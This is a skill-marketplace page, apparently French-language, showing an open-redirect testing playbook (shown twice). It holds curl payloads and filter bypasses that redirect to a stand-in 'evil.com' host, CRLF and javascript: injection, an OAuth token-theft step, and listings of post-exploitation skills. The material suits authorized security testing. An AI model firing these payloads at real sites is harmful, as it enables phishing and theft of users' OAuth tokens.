Exécutez n'importe quel Skill dans Manus
en un clic

Exécutez n'importe quel Skill dans Manus en un clic

Commencer

attack-open-redirect

Étoiles617

Forks102

Mis à jour1 juin 2026 à 19:16

Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains

Installation

Installer avec Codex ou Claude Copiez ce prompt, collez-le dans Codex, Claude ou un autre assistant, puis laissez-le vérifier la page du skill et l'installer pour vous.

Exécuter dans Manus

Source

CyberStrikeus

CyberStrikeus/CyberStrike

Ouvrir le dépôt GitHub Voir les dépôts du créateur

Téléchargement

Exécuter dans Manus

Métiers associésSOC

Basé sur la classification professionnelle SOC

Analystes en sécurité de l'informationProfessions informatiques et mathématiques·SOC 15-1212

SKILL.md

readonly

name	attack-open-redirect
description	Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains
category	web-application
version	1.0
author	cyberstrike-official
tags	["open-redirect","web","phishing","oauth","attack"]
tech_stack	["web"]
cwe_ids	["CWE-601"]
chains_with	["attack-cors","attack-jwt"]
prerequisites	[]
severity_boost	{"attack-jwt":"Open redirect + OAuth = JWT/token theft"}

Open Redirect

Objective

Exploit URL redirect parameters to redirect users to attacker-controlled domains, steal OAuth tokens, or bypass security controls.

Testing Methodology

Phase 1: Identify Redirect Parameters

Common parameter names:

url, redirect, redirect_url, redirect_uri, return, return_url, returnTo,
next, goto, target, dest, destination, rurl, redir, forward, continue,
callback, path, out, view, login_url, image_url, go, link, ref

Phase 2: Basic Payloads

# Direct redirect
curl -s -D- "https://TARGET/redirect?url=https://evil.com"

# Protocol-relative
curl -s -D- "https://TARGET/redirect?url=//evil.com"

# Encoded
curl -s -D- "https://TARGET/redirect?url=https%3A%2F%2Fevil.com"

# Backslash bypass
curl -s -D- "https://TARGET/redirect?url=https://evil.com\@TARGET"

# At-sign bypass
curl -s -D- "https://TARGET/redirect?url=https://TARGET@evil.com"

Phase 3: Filter Bypass

# Subdomain matching
curl -s -D- "https://TARGET/redirect?url=https://TARGET.evil.com"

# URL encoding tricks
curl -s -D- "https://TARGET/redirect?url=https://evil.com%23.TARGET"

# Double encoding
curl -s -D- "https://TARGET/redirect?url=https://%65%76%69%6c.com"

# Null byte
curl -s -D- "https://TARGET/redirect?url=https://evil.com%00.TARGET"

# CRLF + Location header
curl -s -D- "https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com"

# JavaScript scheme
curl -s -D- "https://TARGET/redirect?url=javascript:alert(document.domain)"

# Data URI
curl -s -D- "https://TARGET/redirect?url=data:text/html,<script>alert(1)</script>"

Phase 4: OAuth Token Theft

# Test with OAuth tester
attack_script oauth_tester "https://TARGET/oauth/authorize" \
  --client-id CLIENT_ID \
  --redirect-uri "https://TARGET/callback" \
  --json-output

If redirect_uri accepts attacker domain, the OAuth code/token is sent to the attacker.

Phase 5: Impact Escalation

Redirect in login flow → credential phishing
Redirect in OAuth flow → token theft (P1)
Redirect in email verification → account takeover
Redirect + SSRF → internal access

What Constitutes a Finding

Finding	Severity
Open redirect + OAuth token theft	Critical (P1)
Open redirect in login/auth flow	High (P2)
Generic open redirect	Medium (P3)
JavaScript scheme redirect (XSS)	High (P2)

Evidence Requirements

URL with redirect parameter and payload
Response showing 302/301 to attacker domain
For OAuth: stolen authorization code/token
Location header value in response

Tools

attack_script oauth_tester — OAuth redirect_uri bypass testing
curl — manual redirect testing

References

Plus depuis ce dépôt

même dépôt

ebpf-attacks

CyberStrikeus/CyberStrike

eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux

2026-06-23617

aws-postexploit

CyberStrikeus/CyberStrike

AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3

2026-06-22617

azure-postexploit

CyberStrikeus/CyberStrike

Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation

2026-06-22617

cicd-attacks

CyberStrikeus/CyberStrike

CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab

2026-06-22617

k8s-postexploit

CyberStrikeus/CyberStrike

Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence

2026-06-22617

macos-postexploit

CyberStrikeus/CyberStrike

macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools

2026-06-22617

name	attack-open-redirect
description	Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains
category	web-application
version	1.0
author	cyberstrike-official
tags	["open-redirect","web","phishing","oauth","attack"]
tech_stack	["web"]
cwe_ids	["CWE-601"]
chains_with	["attack-cors","attack-jwt"]
prerequisites	[]
severity_boost	{"attack-jwt":"Open redirect + OAuth = JWT/token theft"}

Open Redirect

Objective

Exploit URL redirect parameters to redirect users to attacker-controlled domains, steal OAuth tokens, or bypass security controls.

Testing Methodology

Phase 1: Identify Redirect Parameters

Common parameter names:

url, redirect, redirect_url, redirect_uri, return, return_url, returnTo,
next, goto, target, dest, destination, rurl, redir, forward, continue,
callback, path, out, view, login_url, image_url, go, link, ref

Phase 2: Basic Payloads

# Direct redirect
curl -s -D- "https://TARGET/redirect?url=https://evil.com"

# Protocol-relative
curl -s -D- "https://TARGET/redirect?url=//evil.com"

# Encoded
curl -s -D- "https://TARGET/redirect?url=https%3A%2F%2Fevil.com"

# Backslash bypass
curl -s -D- "https://TARGET/redirect?url=https://evil.com\@TARGET"

# At-sign bypass
curl -s -D- "https://TARGET/redirect?url=https://TARGET@evil.com"

Phase 3: Filter Bypass

# Subdomain matching
curl -s -D- "https://TARGET/redirect?url=https://TARGET.evil.com"

# URL encoding tricks
curl -s -D- "https://TARGET/redirect?url=https://evil.com%23.TARGET"

# Double encoding
curl -s -D- "https://TARGET/redirect?url=https://%65%76%69%6c.com"

# Null byte
curl -s -D- "https://TARGET/redirect?url=https://evil.com%00.TARGET"

# CRLF + Location header
curl -s -D- "https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com"

# JavaScript scheme
curl -s -D- "https://TARGET/redirect?url=javascript:alert(document.domain)"

# Data URI
curl -s -D- "https://TARGET/redirect?url=data:text/html,<script>alert(1)</script>"

Phase 4: OAuth Token Theft

# Test with OAuth tester
attack_script oauth_tester "https://TARGET/oauth/authorize" \
  --client-id CLIENT_ID \
  --redirect-uri "https://TARGET/callback" \
  --json-output

If redirect_uri accepts attacker domain, the OAuth code/token is sent to the attacker.

Phase 5: Impact Escalation

Redirect in login flow → credential phishing
Redirect in OAuth flow → token theft (P1)
Redirect in email verification → account takeover
Redirect + SSRF → internal access

What Constitutes a Finding

Finding	Severity
Open redirect + OAuth token theft	Critical (P1)
Open redirect in login/auth flow	High (P2)
Generic open redirect	Medium (P3)
JavaScript scheme redirect (XSS)	High (P2)